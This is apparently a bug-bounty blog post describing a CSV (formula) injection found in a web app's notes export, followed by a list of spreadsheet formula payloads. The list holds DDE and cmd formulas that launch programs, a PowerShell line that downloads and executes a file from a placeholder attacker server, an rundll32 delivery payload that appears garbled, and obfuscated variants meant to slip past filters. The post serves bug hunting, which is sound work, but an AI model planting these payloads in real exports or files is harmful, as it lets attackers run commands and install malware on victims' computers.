CSV Injection | Formula Injection | Command Execution | Excel Sheets are not secure !!

CSV Injection | Formula Injection | Command Execution |  Excel Sheets are not secure !!

Hello Hackers,

Let’s read some Cybersecurity Blogs

Today we will discuss one of my recent findings on the bug crowd program…” CSV Injection“, which is used to execute malicious commands on the user’s computers(like calculator, notepad popup, and downloading any malicious file on a computer).

I cannot disclose the name of the program, let’s take it as “example.com“…I have started hunting on the program.

Tried all possible things of bypassing and Account takeover, Boom!!! no luck…

I started trying all the features inside the account and I notice there is an option of making their notes and adding files…and afterward I saw there is a CSV export functionality for files.

Then I started testing the CSV injection on it.

What is CSV injection:

CSV injection or Formula Injection occurs when the website untrusted text is exported into a CSV file and that malicious code is successfully executed on the user’s laptop.


ALL Formula starts with

+ , = , - , @

List of payloads

# popup a calculator
DDE ("cmd";"/C calc";"!A0")A0
@SUM(1+1)*cmd|' /C calc'!A0
=2+5+cmd|' /C calc'!A0

# popup a notepad
=cmd|' /C notepad'!'A1'

# powershell download and execute
=cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0

# msf smb delivery with rundll32
=cmd|'/c rundll32.exe \.0.0.1.dll,0'!_xlbgnm.A1

# Prefix obfuscation and command chaining
=AAAA+BBBB-CCCC&"Hello"/12345&cmd|'/c calc.exe'!A
=cmd|'/c calc.exe'!A*cmd|'/c calc.exe'!A
+thespanishinquisition(cmd|'/c calc.exe'!A
=         cmd|'/c calc.exe'!A

# Using rundll32 instead of cmd
=rundll32|'URL.dll,OpenURL calc.exe'!A
=rundll321234567890abcdefghijklmnopqrstuvwxyz|'URL.dll,OpenURL calc.exe'!A

# Using null characters to bypass dictionary filters. Since they are not spaces, they are ignored when executed.
=    C    m D                    |        '/        c       c  al  c      .  e                  x       e  '   !   A

Let’s talk, about how I found the vulnerability

First I added a Record and then after that, I saw there is a notes option I quickly injected the CSV payload.

In the above image, you can see I have injected a payload that will give a “calculator” popup.

Once I injected this afterward and I tried to download the CSV report.

This will export the name of the record and notes into the CSV file.

The above image contains the content of the CSV file.

Now Video will demonstrate how it works…

In the above, we have demonstrated the exploitation part.

We immediately reported it to the bug crowd, guess what it was a duplicate and they closed the report.

NOw we are done with the blog and it’s time to say goodbye.

Happy Hacking!!

Share this post

About the author

Leave a Reply

Your email address will not be published. Required fields are marked *